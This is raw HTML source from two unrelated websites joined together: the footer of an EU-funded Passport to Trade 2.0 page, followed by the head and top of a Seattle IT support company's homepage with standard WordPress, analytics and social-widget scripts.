class="widget widget_recent_comments"><h3 class="widget-title">#P2T2 project partners</h3> <div id="linkcat-3" class="widget-wrapper widget_links"> <ul class='xoxo blogroll'> <li><a href="http://www.consorziospin.it/index.php?lang=en" title="SPIN">Consorzio SPIN</a></li> <li><a href="http://www.tis-praha.cz/en" title="TIS Praha">Consultancy Tis Praha sro</a></li> <li><a href="http://www.uni-koblenz-landau.de/koblenz/fb4/institute/iwvi" title="Institute for Information Systems Research">Institute for IS Research</a></li> <li><a href="http://www.salford.ac.uk/business-school" title="Salford Business School">Salford Business School</a></li> <li><a href="https://businessculture.org/passport-to-trade-2-0/european-research-centers/">TDI Ltd</a></li> <li><a href="http://www.tse.fi/EN/units/specialunits/entre/Pages/default.aspx" title="TSE Entre">TSE Entre</a></li> <li><a href="http://www.urenio.org/" title="URENIO research unit">URENIO research unit</a></li> <li><a href="http://www.valahia.ro/en/" title="Valahia University of Targoviste">Valahia University of Targoviste</a></li> </ul> </div> </aside> <aside id="archives-2" class="widget widget_archive"> <div id="as_facebook_mem_likebox_widgets" class="widget-wrapper widget_as_facebook_mem_likebox"> <div class="widget-title">Share your European work/study experiences</div> <div id="likeboxwrap" style="width:290px; height:253px; background: #FFFFFF; border:1px solid #; overflow:hidden;"> <div id="likebox-frame"> <iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpassporttotrade2&amp;width=292&amp;height=255&amp;colorscheme=light&amp;show_faces=true&amp;border_color&amp;stream=false&amp;header=false" scrolling="No" frameborder="0" style="border:none; overflow:hidden; width:292px; height:255px; margin:-1px;" allowtransparency="true"></iframe> </div> </div> <div align="left">- <a href="http://Crunchify.com/facebook-members/" title="Facebook Members WordPress Plugin" target="_blank"> <font size="1">Facebook Members WordPress Plugin</font></a></div> </div> <div id="text-6" class="widget-wrapper widget_text"> <div class="textwidget"><a class="twitter-timeline" href="https://twitter.com/Passport2Trade" data-widget-id="349470752178860032">Tweets by @Passport2Trade</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script> </div> </div> </aside> <aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://businessculture.org/cz/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside> </div><!-- .widget-area --> </div><!-- .sidebar-inner --> </div><!-- #tertiary --> </div><!-- #main --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="site-info"> <div class = "alignright"><a href="http://eacea.ec.europa.eu/llp/about_llp/about_llp_en.php" target="_blank"><img src="/wp-content/uploads/2018/10/eu_llp.gif" alt="Education and Culture Lifelong Learning Programme" width="110" height="39" border="0" /></a> </div> <strong>&copy; 2019 Passport to Trade 2.0 - </strong> This project has been funded with support from the European Commission. This publication [communication] reflects the views only of the author, and the Commission cannot be held responsible for any use which may be made of the information contained therein.</div> </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <div id="langbf_bar"> <div class="langbf_links"> <div class="langbf_right"> <ul> <li><a href="/bu" title="български" class="langbf_bg">български</a></li><li><a href="/cz" title="Čeština" class="langbf_cz">Čeština</a></li><li><a href="/de" title="Deutsch" class="langbf_de">Deutsch</a></li><li><a href="/fi" title="suomi" class="langbf_fi">suomi</a></li><li><a href="/fr" title="Français" class="langbf_fr">Français</a></li><li><a href="/gr" title="ελληνικά" class="langbf_gr">ελληνικά</a></li><li><a href="/it" title="Italiano" class="langbf_it">Italiano</a></li><li><a href="/ro" title="Română" class="langbf_ro">Română</a></li><li><a href="/" title="English" class="langbf_uk">English</a></li> </ul> </div> </div> </div><!-- #langbf_bar --> <style type="text/css"> html { margin-top: 26px !important; } * html body { margin-top: 26px !important; } #langbf_bar { top: 0px !important; } </style> <script type="text/javascript"> // <![CDATA[ jQuery(document).ready( function(){ if ( jQuery.isFunction( jQuery.fn.tooltip ) ) { jQuery("#langbf_bar a[title]").tooltip( { offset: [10, 0], position: 'bottom center', effect: 'slide', tipClass: 'langbf_tooltip_top' } ); } } ); // ]]> </script> <script> jQuery(document).ready(function () { jQuery.post('https://businessculture.org?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) { var s = document.createElement("script"); s.type = "text/javascript"; s.innerHTML = response; jQuery("head").append(s); }); }); </script><script type='text/javascript' src='https://businessculture.org/wp-content/themes/twentythirteen/js/functions.js?ver=20160717'></script> <script type='text/javascript' src='https://businessculture.org/wp-includes/js/wp-embed.min.js?ver=5.0.3'></script> <div id="fb-root"></div> <script type="text/javascript" src="https://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="//connect.facebook.net/en_US/all.js#xfbml=1"></script><script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script><script type="text/javascript" src="https://platform.linkedin.com/in.js"></script></body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes"/> <title>IT Network Management, Consulting, Outsourcing | SWAT Systems</title> <link rel="pingback" href="https://www.swatsystems.com/xmlrpc.php" /> <link href="//fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" type="text/css"> <link href="//fonts.googleapis.com/css?family=Source+Sans+Pro" rel="stylesheet" type="text/css"> <link href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/themes/phoenix/bootstrap/css/bootstrap.min.css" rel="stylesheet" /> <link href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/themes/phoenix/fontawesome/css/all.min.css" rel="stylesheet" /> <link href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/themes/phoenix/fontawesome/css/v4-shims.min.css" rel="stylesheet" /> <!--[if IE 7]> <link href="//netdna.bootstrapcdn.com/font-awesome/3.1.1/css/font-awesome-ie7.min.css" rel="stylesheet" /> <![endif]--> <link rel="shortcut icon" href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2014/03/favicon.ico" type="image/x-icon" /> <!-- This site is optimized with the Yoast SEO plugin v9.6 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="SWAT Systems specializes in IT Support, providing business Computer Maintenance and Network Services in Seattle, Bellevue, Ballard, Kirkland, Remond and Lynnwood."/> <link rel="canonical" href="https://www.swatsystems.com/" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.swatsystems.com/#website","url":"https://www.swatsystems.com/","name":"SWAT Systems","potentialAction":{"@type":"SearchAction","target":"https://www.swatsystems.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://www.swatsystems.com/","sameAs":[],"@id":"https://www.swatsystems.com/#organization","name":"SWAT Systems","logo":"https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2017/05/SWAT-Logo-website.png"}</script> <meta name="google-site-verification" content="-lSoWruQw9xBS48r2aWYrtxdJAySwD4vyiogO_FtX3c" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="SWAT Systems &raquo; Feed" href="https://www.swatsystems.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="SWAT Systems &raquo; Comments Feed" href="https://www.swatsystems.com/comments/feed/" /> <link rel="alternate" type="text/calendar" title="SWAT Systems &raquo; iCal Feed" href="https://www.swatsystems.com/events/?ical=1" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.swatsystems.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://pronto-core-cdn.prontomarketing.com/2/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='lightbox_style-css' href='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/pronto-magnific-popup/pronto_magnific_popup.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wooslider-flexslider-css' href='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/wooslider/assets/css/flexslider.css?ver=2.0.1' type='text/css' media='all' /> <link rel='stylesheet' id='wooslider-common-css' href='https://pronto-core-cdn.prontomarketing.com/2/wp-content/plugins/wooslider/assets/css/style.css?ver=2.0.1' type='text/css' media='all' /> <!-- This site uses the Google Analytics by MonsterInsights plugin v5.5.4 - Universal enabled - https://www.monsterinsights.com/ --> <script type="text/javascript"> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-3544263-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('require', 'linkid', 'linkid.js'); __gaTracker('send','pageview'); </script> <!-- / Google Analytics by MonsterInsights --> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://pronto-core-cdn.prontomarketing.com/2/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://www.swatsystems.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.swatsystems.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.swatsystems.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://www.swatsystems.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.swatsystems.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.swatsystems.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.swatsystems.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.swatsystems.com%2F&#038;format=xml" /> <script src='https://bypronto.com/?dm=5dfb0719a6fad5747864eacbb96eddc8&amp;action=load&amp;blogid=324&amp;siteid=1&amp;t=1958169670&amp;back=https%3A%2F%2Fwww.swatsystems.com%2F' type='text/javascript' async></script><meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="https://www.swatsystems.com"><link rel="https://theeventscalendar.com/" href="https://www.swatsystems.com/wp-json/tribe/events/v1/" /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="SWAT Systems" /> <meta property="og:url" content="https://www.swatsystems.com/" /> <meta property="og:site_name" content="SWAT Systems" /> <meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:text:title" content="Home" /> <meta name="twitter:image" content="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/favicon/3382488515.ico" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Visit the post for more." /> <!-- End Jetpack Open Graph Tags --> <link rel="icon" href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/favicon/1507826185.ico" sizes="32x32" /> <link rel="icon" href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/favicon/2671576691.ico" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/favicon/3886982250.ico" /> <meta name="msapplication-TileImage" content="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/cache/2019/05/favicon/2426761610.ico" /> <link rel="stylesheet" id="main-css" href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/themes/phoenix/css/main.css?1555919607" type="text/css" media="all" /> <link rel="stylesheet" id="style-css" href="https://pronto-core-cdn.prontomarketing.com/2/wp-content/themes/phoenix-child/style.css?1526288544" type="text/css" media="all" /> <style> h1, h2, h3, h4, h5, h6 { font-family: "Open Sans", "Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", Verdana, Tahoma, sans-serif; color: #0071ba; } input, button, select, textarea, body { font-family: "Source Sans Pro", "Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", Verdana, Tahoma, sans-serif; } body { color: #393f42;} .body-background { } a { color: #0071ba; } .segment1 { color:#393f42;background-color: #ffffff;} .segment1 h1, .segment1 h2, .segment1 h3, .segment1 h4, .segment1 h5, .segment1 h6 { color: #393f42; } .segment2 { color: #393f42;background-color: #f9f9f7;} .segment2 h1, .segment2 h2, .segment2 h3, .segment2 h4, .segment2 h5, .segment2 h6 { color: #393f42; } .segment3 { color: #333333;background-color: #f9f9f7;} .segment3 h1, .segment3 h2, .segment3 h3, .segment3 h4, .segment3 h5, .segment3 h6 { color: #ff8634; } .segment4 { color: #ffffff;background-color: #0071ba;} .segment4 h1, .segment4 h2, .segment4 h3, .segment4 h4, .segment4 h5, .segment4 h6 { color: #ffffff; } .segment5 { color: #b7b7b7;background-color: #313131;} .segment5 h1, .segment5 h2, .segment5 h3, .segment5 h4, .segment5 h5, .segment5 h6 { color: #b7b7b7; } .accent { color: #0071ba; } /* Tablets */ @media (max-width: 768px) { body {} } /* Landscape phones and down */ @media (max-width: 480px) { body {} } </style> <link rel="stylesheet" type="text/css" id="wp-custom-css" href="https://www.swatsystems.com/?custom-css=fac2193ea3" /> <!-- hook code snippet header --> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("#feed-hp .row-condensed div.col-md-3").removeClass('col-md-3').addClass('col-md-4'); });</script> <!-- end hook code snippet header --> <!--[if lt IE 9]> <script src="https://www.swatsystems.com/assets/crossdomain/respond.min.js"></script> <link href="https://www.swatsystems.com/assets/crossdomain/respond-proxy.html" id="respond-proxy" rel="respond-proxy" /> <link href="https://www.swatsystems.com/assets/nocdn/crossite/respond.proxy.gif" id="respond-redirect" rel="respond-redirect" /> <script src="https://www.swatsystems.com/assets/nocdn/crossite/respond.proxy.js"></script> <script src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/themes/phoenix/js/html5.js" type="text/javascript"></script> <![endif]--> <!---Per Page CSS ---> <style type="text/css"> .testimonial .text-right { color: #DD7935; margin-top: 10px; text-align: left; } .testimonial .text-right strong { font-weight:400; } .home article.blog-list h3 a { font-size:16px; font-weight:700; } </style> </head> <body class="home page-template page-template-template-fullwidth page-template-template-fullwidth-php page page-id-2 tribe-no-js group-blog"> <div> <div> <div class="page-wrap"> <header id="header"><div class="segment1 space-small header-homepage header-transparent header-shadow" ><div class="container"><div class="row"> <div class="col-md-3 margin-top-20 xs-text-center"> <a href="/" class="brand"><img src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2017/05/SWAT-Logo-website.png" class="brand" alt="SWAT Systems"></a> </div> <div class="col-md-9"> <div class="flex-box flex-wrap flex-row-reverse xs-no-flexbox xs-text-center"> <div><a class="btn btn-primary btn-sm portal-btn" href="https://service.swatsystems.com/Support/">Client Portal Login</a></div> <div class="margin-left-10"><a href="tel:206.217.0130"><i class="fa fa-phone accent"></i> 206.217.0130</a></div> <div><ul id="menu-top-nav" class="horizontal list-unstyled top-nav-bar uppercase pull-right"><li id="menu-item-7227" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-2 current_page_item menu-item-7227"><a href="https://www.swatsystems.com/">Home</a></li> <li id="menu-item-7228" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7228"><a href="https://www.swatsystems.com/support-center/">Support Center</a></li> <li id="menu-item-7229" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7229"><a href="https://www.swatsystems.com/about-us/contact-us/">Contact Us</a></li> </ul></div></div> <p class="margin-0 pull-right hidden-md hidden-lg"><nav class="" role="navigation"><ul id="menu-main-nav" class="nav pull-right nav-normal"><li id="menu-item-6599" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6599 dropdown"><a href="https://www.swatsystems.com/about-us/" class="dropdown-toggle disabled" data-toggle="dropdown">About Us <b class="caret"></b></a> <ul class="dropdown-menu"> <li id="menu-item-14089" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14089"><a href="https://www.swatsystems.com/about-us/our-team/">Our Amazing Team</a></li> <li id="menu-item-14088" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14088"><a href="https://www.swatsystems.com/about-us/careers/">Careers</a></li> </ul> </li> <li id="menu-item-6753" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6753 dropdown"><a href="https://www.swatsystems.com/services-solutions/" class="dropdown-toggle disabled" data-toggle="dropdown">Services &amp; Solutions <b class="caret"></b></a> <ul class="dropdown-menu"> <li id="menu-item-5781" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5781"><a href="https://www.swatsystems.com/services-solutions/totalcare/">TotalCare</a></li> <li id="menu-item-5799" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5799"><a href="https://www.swatsystems.com/services-solutions/totalsecurity/">TotalSecurity</a></li> <li id="menu-item-4782" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4782"><a href="https://www.swatsystems.com/services-solutions/totalvoice/">TotalVoice</a></li> <li id="menu-item-5803" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5803"><a href="https://www.swatsystems.com/services-solutions/totaldefense-2/">TotalDefense (BDR)</a></li> <li id="menu-item-516" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-516 dropdown-submenu"><a href="https://www.swatsystems.com/services-solutions/it-consulting/" class="dropdown-toggle disabled" data-toggle="dropdown">IT Project Design/Build</a> <ul class="dropdown-menu"> <li id="menu-item-556" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-556"><a href="https://www.swatsystems.com/services-solutions/it-consulting/security-2/">Network &amp; Data Security</a></li> <li id="menu-item-558" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-558"><a href="https://www.swatsystems.com/services-solutions/it-consulting/office-moves/">Office Moves &amp; Wiring</a></li> <li id="menu-item-948" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-948"><a href="https://www.swatsystems.com/services-solutions/it-consulting/virtualization/">Server and Resource Virtualization</a></li> <li id="menu-item-984" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-984"><a href="https://www.swatsystems.com/services-solutions/it-consulting/hosted-solutions/">Hosted Solutions</a></li> </ul> </li> <li id="menu-item-956" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-956"><a href="https://www.swatsystems.com/services-solutions/email-spam-protection/">Email &amp; Spam Protection</a></li> <li id="menu-item-5792" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5792"><a href="https://www.swatsystems.com/services-solutions/rmon/">RMON &#8211; Remote Management</a></li> <li id="menu-item-10551" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10551"><a href="https://www.swatsystems.com/services-solutions/veeam-cloud-connect/">Veeam Cloud Connect</a></li> <li id="menu-item-513" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-513"><a href="https://www.swatsystems.com/services-solutions/managed-services/">Managed Services</a></li> <li id="menu-item-515" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-515"><a href="https://www.swatsystems.com/services-solutions/business-continuity-planning/">Business Continuity Planning</a></li> <li id="menu-item-146" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-146"><a href="https://www.swatsystems.com/services-solutions/security-assessment/">Security Assessment</a></li> <li id="menu-item-940" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-940"><a href="https://www.swatsystems.com/services-solutions/cloud-services/">Cloud Services</a></li> <li id="menu-item-5184" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5184"><a href="https://www.swatsystems.com/services-solutions/office-365/">Office 365</a></li> </ul> </li> <li id="menu-item-6747" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6747 dropdown"><a href="https://www.swatsystems.com/industry-solutions/" class="dropdown-toggle disabled" data-toggle="dropdown">Industry Solutions <b class="caret"></b></a> <ul class="dropdown-menu"> <li id="menu-item-1100" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1100"><a href="https://www.swatsystems.com/industry-solutions/healthcare/">Healthcare</a></li> <li id="menu-item-1108" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1108"><a href="https://www.swatsystems.com/industry-solutions/accounting-financial/">Accounting &amp; Financial</a></li> <li id="menu-item-1116" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1116"><a href="https://www.swatsystems.com/industry-solutions/construction/">Construction</a></li> <li id="menu-item-7518" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7518"><a href="https://www.swatsystems.com/industry-solutions/legal/">Legal</a></li> <li id="menu-item-7519" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7519"><a href="https://www.swatsystems.com/industry-solutions/staffing-firms/">Staffing Firms</a></li> <li id="menu-item-7520" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7520"><a href="https://www.swatsystems.com/industry-solutions/media-advertising/">Media &amp; Advertising</a></li> <li id="menu-item-7517" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7517"><a href="https://www.swatsystems.com/industry-solutions/technology/">Technology</a></li> </ul> </li> <li id="menu-item-6752" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6752 dropdown"><a href="https://www.swatsystems.com/why-swat-systems/" class="dropdown-toggle disabled" data-toggle="dropdown">Why SWAT? <b class="caret"></b></a> <ul class="dropdown-menu"> <li id="menu-item-8973" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8973"><a href="https://www.swatsystems.com/about-us/referral-program/">Referral Rewards</a></li> <li id="menu-item-2288" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2288"><a href="https://www.swatsystems.com/why-swat-systems/testimonials/">Testimonials</a></li> <li id="menu-item-17" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17"><a href="https://www.swatsystems.com/why-swat-systems/partners-certifications/">Partners &amp; Certifications</a></li> </ul> </li> <li id="menu-item-6600" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6600"><a href="https://www.swatsystems.com/blog/">Blog</a></li> </ul></nav></p> </div> </div> </div></div></header> <div class="bg-slide overflow-hidden"> <div id="banner" class="wooslider banner wooslider-type-slides wooslider-theme-default"> <ul class="slides"> <li class="slide"> <div class="slide-content"> <section class="segment4 space-large" style="background-image: url('https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2014/03/banner-min.jpg'); background-repeat: no-repeat; background-position: top center; background-attachment: scroll; background-size: cover;"> <div class="container"> <div class="row"> <div class="col-md-7 col-sm-7 margin-banner1"> <div class="well-mobile"> <h1 class="huge-font">Is technology holding <br class="hidden-sm hidden-xs" />your company back?</h1> <p class="font-size-20">Make 2019 the year you implement strategic solutions. <br class="hidden-sm hidden-xs" />Call SWAT Systems and schedule your free business consultation!</p> <p class="margin-top-40 no-mobile-margin-top"><a class="btn btn-primary uppercase" href="/contact-us/">Contact Us</a></p> </div> </div> </div> </div> </section> </div> </li> </ul> </div> </div> <section class="segment1 border-top bg-bottom space-huge" style="background-image: url('https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2018/07/techbg7.png');"> <div class="container"> <div class="col-md-5 align-middle col-md-5 col-xs-12 col-sm-5"> <p style="margin-top:15px;margin-bottom:15px"><a href="https://www.youtube.com/watch?v=cWOmIxgRPuo" onclick="__gaTracker('send', 'event', 'outbound-article', 'https://www.youtube.com/watch?v=cWOmIxgRPuo', '');"><img class="img-responsive" src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2018/07/pss-thumbnail.jpg" alt="pss-thumbnail" /></a></p> </div> <div class="col-md-7 align-middle col-md-5 col-sm-7 col-xs-12 xs-text-center"> <h3 style="font-size:1.5em;color:#ff9900;margin-top:15px;margin-bottom:0px"><strong>SEATTLE'S LEADING</strong></h3> <h2 style="margin-top:0"><strong>Technology Support &amp; Consulting Firm</strong></h2> <p class="margin-bottom-20">With SWAT Systems as your virtual CTO, you get greater productivity for a lower cost. It’s a CFO-approved, win-win situation. Click the video to see how <a href="https://www.parkerservices.com/" onclick="__gaTracker('send', 'event', 'outbound-article', 'https://www.parkerservices.com/', 'Parker Staffing Services');">Parker Staffing Services</a> found a winning strategy by switching to SWAT Systems.<br class="visible-lg" /></p> <p style="color:#39659A" class="lead margin-bottom-20">Let's do lunch - we're buying! Click below to get started.</p> <p><a class="btn btn-primary" href="/contact-us/">Connect with us</a> </div> </div> </section> <section class="segment4 space-huge" style="background-color: #3d6aa0; background-image: url('https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2018/07/blueimg3.png'); background-repeat: no-repeat; background-position: center center; background-attachment: scroll;"> <div class="container"> <div class="row"> <div class="col-md-12 text-center"> <h2><strong>Complete IT Management Services</strong></h2> <p class="lead accent2 no-mobile-margin-bottom">Leverage more than 20 years of experience protecting small and medium businesses.</p> </div> </div> <div class="row"> <div class="col-md-3 col-sm-3 text-center"> <img class="img-responsive aligncenter" src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2018/07/TC-icon3.png" alt="TotalCare: Proactive IT Support - Seattle, Bellevue, Ballard" /></p> <h3><strong>TotalCare</strong></h3> <p>Let's increase your business productivity and ROI. Our 100% proactively managed IT and network support services do just that.</p> <p><a class="btn btn-warning" href="/services-solutions/totalcare/">Read more</a> </div> <div class="col-md-3 col-sm-3 text-center"> <img class="img-responsive aligncenter" src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2015/02/widget_totalsecurity.png" alt="TotalSecurity: Email &amp; Server Security - Seattle, Bellevue, Ballard" /></p> <h3><strong>TotalSecurity</strong></h3> <p>Enterprise-grade email and web antivirus services to stop ever-growing virus and phishing threats. SWAT has your back.</p> <p><a class="btn btn-warning" href="/services-solutions/totalsecurity/">Read more</a> </div> <div class="col-md-3 col-sm-3 text-center"> <img class="img-responsive aligncenter" src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2014/03/widget4.png" alt="TotalDefense: Data Backup &amp; Disaster Recovery - Seattle, Bellevue, Ballard" /></p> <h3><strong>TotalDefense</strong></h3> <p>When disaster strikes, you need to be ready to fight back. Business continuity plans and data backup are your first line of defense.</p> <p><a class="btn btn-warning" href="/services-solutions/totaldefense/">Read more</a> </div> <div class="col-md-3 col-sm-3 text-center"> <img class="img-responsive aligncenter" src="https://pronto-core-cdn.prontomarketing.com/2/wp-content/uploads/sites/324/2014/03/widget1.png" alt="TotalVoice: Business Phone Solutions - Seattle, Bellevue, Ballard" /></p> <h3><strong>TotalVoice</strong></h3> <p>Competitively priced, top quality, cutting edge phone solutions for small and medium sized businesses. Because it’s good to stay in touch.</p> <p><a class="btn btn-warning" href="/services-solutions/totalvoice/">Read more</a> </div> </div> </div> </section> <section class="segment3 hide space-large"> <div class="container"> <div class="row"> <div class="col-md-12 text-center"> <h2 class="margin-bottom-40 no-mobile-margin-bottom">Partnering with the best so you can achieve more</h2> </div> </div> <div class="row"> 